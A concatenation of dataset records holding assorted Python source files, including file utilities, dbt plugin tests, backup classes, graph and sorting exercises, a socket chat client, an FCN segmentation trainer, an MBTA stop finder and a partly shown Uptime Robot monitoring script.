5]\nf = [[1, 4], [2, 5], [3, 4]]\nisFunction(A, B, f)\nimage(f)\nisOneToOne(A, B, f)\nisOnto(A, B, f)\ninverse(A, B, f)\n","sub_path":"Function.py","file_name":"Function.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"569518492","text":"import os\n\n\ndef create_file(file_path):\n file = open(file_path, 'w')\n file.close()\n return file\n\n\ndef add_file_content(file_path, content):\n with open(file_path, 'a') as file:\n file.write(content + '\\n')\n return 
file\n\n\ndef replace_file_string(file_path, old_string, new_string):\n if os.path.exists(file_path):\n with open(file_path, 'r') as file:\n data = file.read()\n data = data.replace(old_string, new_string)\n with open(file_path, 'w') as file:\n file.write(data)\n else:\n print('An error occurred')\n\n\ndef delete_file(file_path):\n try:\n os.remove(file_path)\n except FileNotFoundError:\n print('An error occurred')\n\n\ninput_data = input()\n\nwhile input_data != 'End':\n input_data = input_data.split('-')\n command = input_data[0]\n\n if command == 'Create':\n file_path = input_data[1]\n create_file(file_path)\n elif command == 'Add':\n file_path = input_data[1]\n content = input_data[2]\n add_file_content(file_path, content)\n elif command == 'Replace':\n file_path = input_data[1]\n old_string = input_data[2]\n new_string = input_data[3]\n replace_file_string(file_path, old_string, new_string)\n elif command == 'Delete':\n file_path = input_data[1]\n delete_file(file_path)\n input_data = input()\n","sub_path":"file_handling/exercise/file_manipulator.py","file_name":"file_manipulator.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"294449459","text":"import pytest\nfrom dbt.plugins import PluginManager, dbtPlugin, dbt_hook\nfrom dbt.plugins.manifest import PluginNodes, ModelNodeArgs\nfrom dbt.plugins.contracts import PluginArtifacts, PluginArtifact\n\n\nclass GetNodesPlugin(dbtPlugin):\n @dbt_hook\n def get_nodes(self) -> PluginNodes:\n nodes = PluginNodes()\n nodes.add_model(\n ModelNodeArgs(\n name=\"test_name\",\n package_name=self.project_name,\n identifier=\"test_identifier\",\n schema=\"test_schema\",\n )\n )\n return nodes\n\n\nclass GetArtifactsPlugin(dbtPlugin):\n @dbt_hook\n def get_manifest_artifacts(self, manifest) -> PluginArtifacts:\n return {self.project_name: PluginArtifact()}\n\n\nclass TestPluginManager:\n @pytest.fixture\n def get_nodes_plugin(self):\n return GetNodesPlugin(project_name=\"test\")\n\n @pytest.fixture\n def get_nodes_plugins(self, get_nodes_plugin):\n return [get_nodes_plugin, GetNodesPlugin(project_name=\"test2\")]\n\n @pytest.fixture\n def get_artifacts_plugin(self):\n return GetArtifactsPlugin(project_name=\"test\")\n\n @pytest.fixture\n def get_artifacts_plugins(self, get_artifacts_plugin):\n return [get_artifacts_plugin, GetArtifactsPlugin(project_name=\"test2\")]\n\n def test_plugin_manager_init_single_hook(self, get_nodes_plugin):\n pm = PluginManager(plugins=[get_nodes_plugin])\n assert len(pm.hooks) == 1\n\n assert \"get_nodes\" in pm.hooks\n assert len(pm.hooks[\"get_nodes\"]) == 1\n assert pm.hooks[\"get_nodes\"][0] == get_nodes_plugin.get_nodes\n\n def test_plugin_manager_init_single_hook_multiple_methods(self, get_nodes_plugins):\n pm = PluginManager(plugins=get_nodes_plugins)\n assert len(pm.hooks) == 1\n\n assert \"get_nodes\" in pm.hooks\n assert len(pm.hooks[\"get_nodes\"]) == 2\n assert pm.hooks[\"get_nodes\"][0] == get_nodes_plugins[0].get_nodes\n assert pm.hooks[\"get_nodes\"][1] == get_nodes_plugins[1].get_nodes\n\n def test_plugin_manager_init_multiple_hooks(self, get_nodes_plugin, get_artifacts_plugin):\n pm = PluginManager(plugins=[get_nodes_plugin, get_artifacts_plugin])\n assert len(pm.hooks) == 2\n\n assert \"get_nodes\" in pm.hooks\n assert len(pm.hooks[\"get_nodes\"]) == 1\n assert pm.hooks[\"get_nodes\"][0] == get_nodes_plugin.get_nodes\n\n assert \"get_manifest_artifacts\" in pm.hooks\n assert 
len(pm.hooks[\"get_manifest_artifacts\"]) == 1\n assert pm.hooks[\"get_manifest_artifacts\"][0] == get_artifacts_plugin.get_manifest_artifacts\n\n def test_get_nodes(self, get_nodes_plugins):\n pm = PluginManager(plugins=get_nodes_plugins)\n nodes = pm.get_nodes()\n assert len(nodes.models) == 2\n\n def test_get_manifest_artifact(self, get_artifacts_plugins):\n pm = PluginManager(plugins=get_artifacts_plugins)\n artifacts = pm.get_manifest_artifacts(None)\n assert len(artifacts) == 2\n","sub_path":"tests/unit/test_plugin_manager.py","file_name":"test_plugin_manager.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"610082893","text":"from __future__ import with_statement\n\nimport sys\nimport logging\n\nfrom scalarizr import storage2, util\nfrom scalarizr.libs import bases\n\nLOG = logging.getLogger(__name__)\n\n\nclass Error(Exception):\n pass\n\n\nbackup_types = {}\nrestore_types = {}\n\n\ndef backup(*args, **kwds):\n if args:\n if isinstance(args[0], dict):\n return backup(**args[0])\n else:\n return args[0]\n type_ = kwds.get('type', 'base')\n try:\n cls = backup_types[type_]\n except KeyError:\n msg = \"Unknown backup type '%s'. \" \\\n \"Have you registered it in \" \\\n \"scalarizr.services.backup.backup_types?\" % type_\n raise Error(msg)\n return cls(**kwds)\n\n\ndef restore(*args, **kwds):\n if args:\n if isinstance(args[0], dict):\n return restore(**args[0])\n else:\n return args[0]\n type_ = kwds.get('type', 'base')\n try:\n cls = restore_types[type_]\n except KeyError:\n msg = \"Unknown restore type '%s'. \" \\\n \"Have you registered it in \" \\\n \"scalarizr.services.backup.restore_types?\" % type_\n raise Error(msg)\n return cls(**kwds)\n\n\nclass Backup(bases.Task):\n features = {\n 'start_slave': True\n }\n\n def __init__(self,\n type='base',\n description=None,\n tags=None,\n **kwds):\n super(Backup, self).__init__(\n type=type,\n description=description,\n tags=tags or {},\n **kwds)\n\n\nclass Restore(bases.Task):\n\n features = {\n 'master_binlog_reset': False\n }\n '''\n When 'master_binlog_reset' = False,\n rolling this restore on Master causes replication binary log reset.\n Slaves should start from the binary log head. 
Detecting the first\n position in binary log is implementation dependent and Master is\n responsible for this.\n '''\n\n def __init__(self,\n type='base',\n **kwds):\n super(Restore, self).__init__(\n type=type,\n **kwds)\n\n\nbackup_types['base'] = Backup\nrestore_types['base'] = Restore\n\n\nclass SnapBackup(Backup):\n\n def __init__(self,\n volume=None,\n **kwds):\n super(SnapBackup, self).__init__(\n volume=volume,\n **kwds)\n self.define_events(\n # Fires when all disk I/O activity should be freezed\n 'freeze',\n # Fires when all disk I/O activity should be resumed\n 'unfreeze'\n )\n\n def _run(self):\n self.volume = storage2.volume(self.volume)\n LOG.debug('Volume obj: %s', self.volume)\n LOG.debug('Volume config: %s', dict(self.volume))\n state = {}\n self.fire('freeze', self.volume, state)\n try:\n snap = self.volume.snapshot(self.description, tags=self.tags)\n finally:\n self.fire('unfreeze', self.volume, state)\n try:\n util.wait_until(lambda: snap.status() in (snap.COMPLETED, snap.FAILED),\n start_text='Polling snapshot status (%s)' % snap.id,\n logger=LOG)\n except:\n if 'Request limit exceeded' in str(sys.exc_info()[1]):\n pass\n else:\n raise\n if snap.status() == snap.FAILED:\n msg = 'Backup failed because snapshot %s failed' % snap.id\n raise Error(msg)\n return restore(\n type=self.type,\n snapshot=snap,\n **state)\n\n\nclass SnapRestore(Restore):\n\n def __init__(self, snapshot=None, volume=None, **kwds):\n super(SnapRestore, self).__init__(\n snapshot=snapshot,\n volume=volume,\n **kwds)\n\n\n def _run(self):\n self.snapshot = storage2.snapshot(self.snapshot)\n if self.volume:\n self.volume = storage2.volume(self.volume)\n self.volume.snap = self.snapshot\n self.volume.ensure()\n else:\n self.volume = self.snapshot.restore()\n return self.volume\n\n\nbackup_types['snap'] = SnapBackup\nrestore_types['snap'] = SnapRestore\n","sub_path":"src/scalarizr/services/backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":4450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"501196061","text":"#!/bin/usr/python3\n\nclass Node(object):\n def __init__(self,name):\n self.neighbours = []\n self.visited = False\n self.name = name\n \n \nclass Graph1(object):\n \n def __init__(self):\n self.graph_dict = {}\n \n\n def depth_first_search(self,start):\n if self is None:\n return 0\n \n visit(start)\n start.visited = True\n for neighbour_node in start.neighbours:\n if neighbour_node.visited is False:\n depth_first_search(neighbour_node)\n \n\n def find_path(self,start,end,path=[]):\n if start is end:\n return None\n if start.value not in self.graph_dict:\n return None\n path.append(start)\n \n for list1 in self.graph_dict[start]:\n for node in list1:\n if node.name not in path:\n new_path = find_path(node,end)\n if new_path:\n return new_path\n \n return None \n \nclass Vertex(object):\n def __init__(self):\n self.distance = None\n self.predecessor = None\n self.marked = False\n self.neighbours = []\n \nclass Graph2(object):\n def __init__(self):\n self.graph_dict = {}\n \n def breadth_first_search(self,start):\n if self is None:\n return 0\n \n que = Queue()\n start.marked = True\n que.add(start)\n while not que:\n node = que.remove()\n visit(node)\n for n in node.neighbours:\n if node.marked is False:\n node.marked = True\n que.remove(node)\n \n \n \n \n \n \n 
","sub_path":"Graph.py","file_name":"Graph.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"645543240","text":"\n###########################################\n# DSFG ~ Katie House ~ 8/14/18\n# DESCTIPTION: List Google Drive links for Automan\n# INPUT: Google Drive File ID\n# OUTPUT: Google Drive Folder ID\n###########################################\n\nfrom __future__ import print_function\nfrom apiclient.discovery import build\nfrom httplib2 import Http\nfrom oauth2client import file as oauth_file, client, tools\nfrom apiclient import errors\n\n\ndef print_parents(service, file_id):\n \"\"\"Print a file's parents.\n\n Args:\n service: Drive API service instance.\n file_id: ID of the file to print parents for.\n \"\"\"\n try:\n parents = service.parents().list(fileId=file_id).execute()\n for parent in parents['items']:\n print('File Id: %s' % parent['id'])\n except error:\n print('An error occurred: %s' % error)\n\ndef main(): \n store = oauth_file.Storage('token.json')\n creds = store.get()\n if not creds or creds.invalid:\n flow = client.flow_from_clientsecrets('credentials.json', SCOPES)\n creds = tools.run_flow(flow, store)\n service = build('drive', 'v2', http=creds.authorize(Http()))\n\n # List all image links in a .txt file\n print_parents(service, '1_3g_aKodcJxYnuMZObePMN77AjnQlBmM')\n \nif __name__ == '__main__':\n main()\n ","sub_path":"preprocessing/townhall-data/links-for-automan/get-folder-id.py","file_name":"get-folder-id.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"134109208","text":"\n#삽입정렬 : while\n#class화 시키기 -> 버블, 선택\n\nimport random\n\ndef m_list(x,list):\n for i in range(x):\n a = random.randrange(1,101)\n list.append(a)\n\ndef insertion(x):\n while x < (len(lst)):\n for i in range(0,x):\n if lst[x] < lst[i]:\n space = lst[x]\n lst[x] = lst[i]\n lst[i] = space\n x += 1\n\ni = int(input(\">>\"))\n\nlst = []\nm_list(i,lst)\n\ncopy = 1\ninsertion(copy)\nspace = 0\n\nprint(lst)","sub_path":"insertion.py","file_name":"insertion.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"277199591","text":"# Import pandas as pd\nfile = '../_datasets/log_file.txt'\nimport pandas as pd\nimport numpy as np\n\ncol1 = []\n\ncol2 = []\n\ncol3 = []\n\nwith open(file) as f:\n txt = f.readlines()\n\nprint(txt,txt[0],txt[1])\n\nprint(txt[0].split(']')[0].strip('['))\nprint(txt[0].split(' ')[1])\nprint(txt[0].split(' ')[2])\n# print(txt[0].split(']')[0].strip('['))\n\nfor line in txt:\n\n ss=line.split(' ',2)\n\n s=line.split(']')[0].strip('[')\n\n # dt = datetime.strptime(s1, dtfmt)\n\n col1.append(s)\n\n s1=line.split(' ')[1].strip()\n\n col2.append(s1)\n\n if len(line) > (len(s)+len(s1)):\n\n col3.append(ss[2].strip('\\n'))\n\n else:\n\n col3.append(np.nan)\n\ndf = pd.DataFrame([col1, col2, col3])\n\ndf = df.T\n\ndf.columns=['ID','Event_name', 'Message']\n\n# Assign the filename: file\n\n# Read the file into a DataFrame: df\n#df = pd.read_csv(file)\n\n# View the head of the DataFrame\nprint(df.head())","sub_path":"05-importing-data-in-python-(part-1)/1-introduction-and-flat-files/Reading-flat-log-file.py","file_name":"Reading-flat-log-file.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} 
+{"seq_id":"252949470","text":"#!/usr/bin/python3\n# -*- coding:utf-8 -*-\nimport sys\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QApplication, QLabel, QWidget\n\n\nclass Example(QWidget):\n def __init__(self):\n super().__init__()\n self.initUI();\n\n def initUI(self):\n label1 = QLabel(\"Label 1 \", self)\n label1.move(10, 10)\n\n label2 = QLabel(\"Label 1 \", self)\n label2.move(20, 20)\n\n label3 = QLabel(\"Label 1 \", self)\n label3.move(30, 30)\n\n self.setGeometry(100, 100, 500, 500)\n self.setWindowTitle('absolute ')\n self.show()\n\n # def keyPressEvent(self, e):\n # if e.key() == Qt.Key_Escape:\n # self.close()\n\n def keyPressEvent(self, e):\n if e.key() == Qt.Key_Escape:\n self.close()\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = Example()\n sys.exit(app.exec_())\n","sub_path":"com/slkk/pyqt/escape.py","file_name":"escape.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"24305216","text":"import socket\r\nfrom threading import Thread\r\n\r\nnickname = input('Please enter your nickname ')\r\n\r\nclient = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\nipAdress = '127.0.0.1'\r\nport = 5080\r\n\r\nclient.connect((ipAdress, port))\r\n\r\nprint(\"Connected with server\")\r\n\r\ndef receive():\r\n while True:\r\n try:\r\n message = client.recv(2048).decode('utf-8')\r\n\r\n if message == 'NICKNAME':\r\n client.send(nickname.encode('utf-8'))\r\n else:\r\n print(message)\r\n except:\r\n print(\"An error occured\")\r\n client.close()\r\n break\r\n\r\ndef write():\r\n while True:\r\n message = '{} : {}'.format(nickname, input(''))\r\n client.send(message.encode('utf-8'))\r\n\r\nreceive_thread = Thread(target = receive)\r\nreceive_thread.start()\r\nwrite_thread = Thread(target = write)\r\nwrite_thread.start()","sub_path":"quizclient.py","file_name":"quizclient.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"650564439","text":"import string\n\ntext = open(\"oldman.txt\", \"r\")\n\nUniqueWords = dict() # creates an empty ditionary called new\n\nfor line in text:\n\n line = line.strip()\n\n line = line.lower()\n\n #Removing the punctuation marks from the line\n line = line.translate(line.maketrans(\"\", \"\", string.punctuation))\n\n # Split the line into words\n words = line.split(\" \")\n\n for word in words: \n if word in UniqueWords:\n UniqueWords[word] = UniqueWords[word] + 1\n else:\n UniqueWords[word] = 1\n\nfor key in UniqueWords.keys():\n print(key, \":\", UniqueWords[key])\n\n ","sub_path":"assignment/fileAndException_handling/uniqueAndFrequency.py","file_name":"uniqueAndFrequency.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"96087480","text":"import numpy as np\n\n''' read_CSIRO.py\n\nThis script loads the global sea level data from CSIRO file\n\nParameters: \nfile = Full path to file for loading\ncenteryear = Year at which the data should be centered (default: 2005)\n\nReturn: \nX1 = Matrix containing latitude, longitude, and years of record (lat and lon set to 1e6)\nY = Sea level data\ndY = Uncertainty around sea level data\nregions = Region identifer\nregionsu = ?\nsitenames = \"CSIRO GSL\"\nsitecoords = [1e6 1e6]\nsitelen = Length of the global sea level record\nsitecoastline = 0\n\nNote: This function returns many fields that are 
not necessary when dealing with a global\ndata set. The reason for having them though is to maintain commonalities with the full\nReadPSMSLData.m code from the original K14 workflow.\n\n'''\n\ndef read_CSIRO(file, centeryear=2005):\n\t\n\t# Open the file\n\tdata = np.loadtxt(file, skiprows=1, delimiter=',')\n\t\n\t# Extract the data\n\tyears = data[:,0]\n\trsl = data[:,1]\n\trslunc = data[:,2]/2\n\t\n\t# Center the data on the required year\n\tcenteryear_ind = np.argmin(np.abs(years - centeryear))\n\trsl = rsl - rsl[centeryear_ind]\n\t\n\t# Populate the output variables\n\tX1 = np.hstack((1e6*np.ones((len(years),2)), years.reshape((-1,1))))\n\tregions = np.zeros(len(years))\n\tY = rsl\n\tdY = rslunc\n\tsitelen = len(rsl)\n\tregionsu = 0\n\tsitenames = \"CSIRO GSL\"\n\tsitecoords = np.array([1e6,1e6])\n\tsitecoastline = 0\n\t\n\treturn(X1,Y, dY, regions, regionsu, sitenames, sitecoords, sitelen, sitecoastline)","sub_path":"modules/tlm/sterodynamics/read_CSIRO.py","file_name":"read_CSIRO.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"257334042","text":"import os.path\nimport tensorflow as tf\nimport helper\nimport warnings\nfrom distutils.version import LooseVersion\nimport tests\n\n\nprint('TensorFlow Version: {}'.format(tf.__version__))\nassert (LooseVersion(tf.__version__) >= LooseVersion('1.0'),\n 'Please use TensorFlow version 1.0 or newer.')\n\nif not tf.test.gpu_device_name():\n warnings.warn('No GPU found.')\nelse:\n print('Default GPU Device: {}'.format(tf.test.gpu_device_name()))\n\n\ndef load_vgg(sess, vgg_path):\n tf.saved_model.loader.load(sess, ['vgg16'], vgg_path)\n graph = tf.get_default_graph()\n\n image_input = graph.get_tensor_by_name('image_input:0')\n keep_prob = graph.get_tensor_by_name('keep_prob:0')\n layer3 = graph.get_tensor_by_name('layer3_out:0')\n layer4 = graph.get_tensor_by_name('layer4_out:0')\n layer7 = graph.get_tensor_by_name('layer7_out:0')\n \n return image_input, keep_prob, layer3, layer4, layer7\n\ntests.test_load_vgg(load_vgg, tf)\n\n\ndef layers(vgg_layer3_out, vgg_layer4_out, vgg_layer7_out, num_classes):\n layer3 = tf.layers.conv2d(vgg_layer3_out, num_classes, 1, padding='same',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n layer4 = tf.layers.conv2d(vgg_layer4_out, num_classes, 1, padding='same',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n layer7 = tf.layers.conv2d(vgg_layer7_out, num_classes, 1, padding='same',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n\n decode1 = tf.layers.conv2d_transpose(layer7, num_classes, 4, 2, padding='same',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n decode2 = tf.add(decode1, layer4)\n decode3 = tf.layers.conv2d_transpose(decode2, num_classes, 4, 2, padding='same',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n decode4 = tf.add(decode3, layer3)\n output = tf.layers.conv2d_transpose(decode4, num_classes, 16, 8, padding='same',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n\n return output\n\ntests.test_layers(layers)\n\n\ndef optimize(nn_last_layer, correct_label, learning_rate, num_classes):\n logits = tf.reshape(nn_last_layer, (-1, num_classes))\n labels = tf.reshape(correct_label, (-1, num_classes))\n\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=labels)\n cross_entropy_loss = tf.reduce_mean(cross_entropy)\n\n optimizer = tf.train.AdamOptimizer(learning_rate)\n train_op = 
optimizer.minimize(cross_entropy_loss)\n\n return logits, train_op, cross_entropy_loss\n\ntests.test_optimize(optimize)\n\n\ndef train_nn(sess, epochs, batch_size, get_batches_fn, train_op, cross_entropy_loss, input_image,\n correct_label, keep_prob, learning_rate):\n sess.run(tf.global_variables_initializer())\n print('Training...')\n print()\n\n for epoch in range(epochs):\n print('EPOCH {} ...'.format(epoch+1))\n\n for image, label in get_batches_fn(batch_size):\n _, loss = sess.run([train_op, cross_entropy_loss],\n feed_dict={input_image: image, correct_label: label,\n keep_prob: 0.5, learning_rate: 0.0005})\n print('Loss: {}'.format(loss))\n \n print()\n\ntests.test_train_nn(train_nn)\n\n\ndef run():\n num_classes = 2\n image_shape = (160, 576)\n data_dir = './data'\n runs_dir = './runs'\n\n tests.test_for_kitti_dataset(data_dir)\n helper.maybe_download_pretrained_vgg(data_dir)\n\n # OPTIONAL: Train and Inference on the cityscapes dataset instead of the Kitti dataset.\n # Needs a GPU with at least 10 teraFLOPS to train on.\n # https://www.cityscapes-dataset.com/\n\n with tf.Session() as sess:\n vgg_path = os.path.join(data_dir, 'vgg')\n get_batches_fn = helper.gen_batch_function(os.path.join(data_dir, 'data_road/training'), image_shape)\n\n epochs = 50\n batch_size = 5\n\n correct_label = tf.placeholder(tf.int32, [None, None, None, num_classes])\n learning_rate = tf.placeholder(tf.float32)\n\n input_image, keep_prob, layer3, layer4, layer7 = load_vgg(sess, vgg_path)\n output = layers(layer3, layer4, layer7, num_classes)\n logits, train_op, cross_entropy_loss = optimize(output, correct_label, learning_rate, num_classes)\n\n train_nn(sess, epochs, batch_size, get_batches_fn, train_op, cross_entropy_loss, input_image,\n correct_label, keep_prob, learning_rate)\n\n helper.save_inference_samples(runs_dir, data_dir, sess, image_shape, logits, keep_prob, input_image)\n\n\nif __name__ == '__main__':\n run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"424640969","text":"import urllib.request\nimport json\n# from googlemaps import GoogleMaps\nfrom pprint import pprint\n\n\n\n# Useful URLs (you need to add the appropriate parameters for your requests)\nGMAPS_BASE_URL = \"http://maps.googleapis.com/maps/api/geocode/json?\"\nMBTA_BASE_URL = \"http://realtime.mbta.com/developer/api/v2/stopsbylocation\"\nMBTA_DEMO_API_KEY = \"wX9NwuHnZU2ToO7GmGR9uw\"\n\n\n# A little bit of scaffolding if you want to use it\n\ndef get_json(url):\n \"\"\"\n Given a properly formatted URL for a JSON web API request, return\n a Python JSON object containing the response to that request.\n \"\"\"\n\n f = urllib.request.urlopen(url)\n response_text = f.read().decode('utf-8')\n response_data = json.loads(response_text)\n return response_data\n\n\n\n\ndef get_lat_long(place_name):\n \"\"\"\n Given a place name or address, return a (latitude, longitude) tuple\n with the coordinates of the given place.\n See https://developers.google.com/maps/documentation/geocoding/\n for Google Maps Geocode API URL formatting requirements.\n \"\"\"\n new_place = str()\n for letter in place_name:\n if letter is not ' ':\n new_place = new_place + letter\n else:\n new_place += '%20'\n\n\n url = GMAPS_BASE_URL +'address=' + new_place\n\n\n json_data = get_json(url)\n\n return json_data['results'][0]['geometry']['location']['lat'], json_data['results'][0]['geometry']['location']['lng']\n\n\n\ndef 
get_nearest_station(latitude, longitude):\n \"\"\"\n Given latitude and longitude strings, return a (station_name, distance)\n tuple for the nearest MBTA station to the given coordinates.\n See http://realtime.mbta.com/Portal/Home/Documents for URL\n formatting requirements for the 'stopsbylocation' API.\n \"\"\"\n\n\n\n MBTA_BASE_URL = \"http://realtime.mbta.com/developer/api/v2/stopsbylocation\"\n MBTA_DEMO_API_KEY = \"wX9NwuHnZU2ToO7GmGR9uw\"\n\n url_m = MBTA_BASE_URL +'?api_key=' + MBTA_DEMO_API_KEY + \"&lat=\" + str(latitude) + \"&lon=\" + str(longitude) + '&format=json'\n station_json = get_json(url_m)\n station_name = station_json['stop'][0]['stop_name']\n distance = station_json['stop'][0]['distance']\n distance = '{:.2f}'.format(float(distance))\n return (station_name, distance)\n\n\n\n\ndef find_stop_near(place_name):\n \"\"\"\n Given a place name or address, return the nearest MBTA stop and the \n distance from the given place to that stop.\n \"\"\"\n\n lat, lng = get_lat_long(place_name)\n return get_nearest_station(lat, lng)\n\n\n\nprint(find_stop_near('fenway park'))\n\n# find_stop_near('fenway')\n","sub_path":"src/mbta_helper.py","file_name":"mbta_helper.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"566116160","text":"\"\"\"\nMetoda bisectiei\n------------------\nSa se rezolve(aproximativ) ecuatia cosx=x pe interval[0,pi/2]\n\n//////////////////////////////////////////////////////////////////////////////////////////////////////\nMetoda bisectiei (injumatatirii intervalului pentru rezolvarea numericca aproximativa a ecuatiilor\"\"\"\nfrom math import cos\nfrom math import pi\ndef f(x):\n return cos(x)-x\n\na=float(eval(input('a=')))\nb=float(eval(input('b=')))\neps=float(input('eps='))\nc=(a+b)/2\nwhile abs(b-a) >=eps:\n if f(c)==0:\n print('radacina este', c)\n elif f(a)*f(c)<0:\n b=c\n else:\n a=c\n c=(a+b)/2\nprint('radacina aproximativa este ', format(c, '.5f'))\n","sub_path":"generate_nr_from_4/metoda bisectiei.py","file_name":"metoda bisectiei.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"228990429","text":"#!/usr/bin/env python3\n\nimport http.client\nimport json\nimport sys\nimport os\n\n\nAPI_KEY = os.environ.get('UPTIME_ROBOT_API_KEY')\nif API_KEY == None:\n\tprint(\"API Key not found. Be sure to set UPTIME_ROBOT_API_KEY environment variable.\")\n\tsys.exit()\n\n\nALERT_CONTACT_ID = os.environ.get('UPTIME_ROBOT_ALERT_CONTACTS')\nif API_KEY == None:\n\tprint(\"Alert contacts not set. 
Be sure to set ALERT_CONTACT_ID environment variable.\")\n\tsys.exit()\n\n\nINTERVAL = 60\nLIMIT = 50\nMONITORS = {'monitors': []}\n\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\ndef uptimeRequest(location,payload):\n\n\tdefault_payload = \"api_key=\"+ API_KEY\n\tdefault_payload += \"&format=json\"\n\n\tdefault_payload += payload\n\theaders = {\n \t\t'content-type': \"application/x-www-form-urlencoded\",\n \t\t'cache-control': \"no-cache\"\n\t}\n\tconn = http.client.HTTPSConnection(\"api.uptimerobot.com\")\n\tconn.request(\"POST\", location, default_payload, headers) \n\tres = conn.getresponse()\n\tdata = res.read()\n\treturn(json.loads(data))\n\ndef getMonitors(page = 1, offset = 0):\n\n\tpayload = \"&alert_contacts=1\"\n\tpayload += \"&offset=\"+str(offset)\n\tpayload += \"&limit=\"+str(LIMIT)\n \n\tdata = uptimeRequest(\"/v2/getMonitors\",payload)\n\t\n\tfor monitor in data['monitors']:\n\t\ti = len(MONITORS) + 1\n\t\tMONITORS['monitors'].append(monitor)\n\n\t#calculate pagination\n\tpage = int(page) + 1\n\toffset = (LIMIT * page) - LIMIT\n\tif offset < data['pagination']['total']:\n\t\tgetMonitors(page, offset)\n\ndef listMonitors():\n\tgetMonitors()\n\tfor monitor in MONITORS['monitors']:\n\n\t\tif monitor['status'] == 0:\n\t\t\tstatus = bcolors.OKGREEN + \"paused\" + bcolors.ENDC\n\t\telif monitor['status'] == 1:\n\t\t\tstatus = bcolors.OKGREEN + \"paused\" + bcolors.ENDC\n\t\telif monitor['status'] == 2:\n\t\t\tstatus = bcolors.OKGREEN + \"online\" + bcolors.ENDC\n\t\telse:\n\t\t\tstatus = bcolors.FAIL + \"offline\" + bcolors.ENDC\n\t\tprint(monitor['friendly_name'],status)\n\ndef listMonitorIdByName(name):\n\tgetMonitors()\n\tfor monitor in MONITORS['monitors']:\n\t\tif name == monitor['friendly_name']:\n\t\t\treturn(monitor['id'])\n\ndef deleteMonitorByName(name):\n\treturn deleteMonitorById(listMonitorIdByName(name))\n\ndef deleteMonitorById(id):\n\tpayload = \"&id=\"+str(id)\n\tprint(uptimeRequest(\"/v2/deleteMonitor\",payload))\n\n\ndef addMonitor(monitor_type, url):\n\n\t#types\n\t#1 - HTTP(s)\n\t#2 - Keyword\n\t#3 - Ping\n\t#4 - Port\n\t\n\t#sub types\n\t#1 - HTTP (80)\n\t#2 - HTTPS (443)\n\t#3 - FTP (21)\n\t#4 - SMTP (25)\n\t#5 - POP3 (110)\n\t#6 - IMAP (143)\n\t#99 - Custom Port\n\n\tif monitor_type == \"http\":\n\t\tMONITOR_TYPE = \"1\"\n\t\tSUB_TYPE = \"1\"\n\t\tPORT = \"\"\n\t\tURL = \"http://\"+url\n\telif monitor_type == \"https\":\n\t\tMONITOR_TYPE = \"1\"\n\t\tSUB_TYPE = \"2\"\n\t\tPORT = \"\"\n\t\tURL = \"https://\"+url\n\telif monitor_type == \"smtp\":\n\t\tMONITOR_TYPE = \"4\"\n\t\tSUB_TYPE = \"4\"\n\t\tPORT = \"\"\n\t\tURL = url\n\telif monitor_type == \"imap\":\n\t\tMONITOR_TYPE = \"4\"\n\t\tSUB_TYPE = \"6\"\n\t\tPORT = \"\"\n\t\tURL = url\n\telif monitor_type == \"ssh\":\n\t\tMONITOR_TYPE = \"4\"\n\t\tSUB_TYPE = \"99\"\n\t\tPORT = \"22\"\n\t\tURL = url\n\telif monitor_type == \"mysql\":\n\t\tMONITOR_TYPE = \"4\"\n\t\tSUB_TYPE = \"99\"\n\t\tPORT = \"3306\"\n\t\tURL = url\n\telif monitor_type == \"ping\":\n\t\tMONITOR_TYPE = \"3\"\n\t\tSUB_TYPE = \"\"\n\t\tPORT = \"\"\n\t\tURL = 